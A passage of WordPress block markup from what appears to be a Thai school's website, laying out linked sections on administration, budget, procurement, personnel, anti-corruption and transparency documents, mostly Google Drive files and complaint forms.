900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 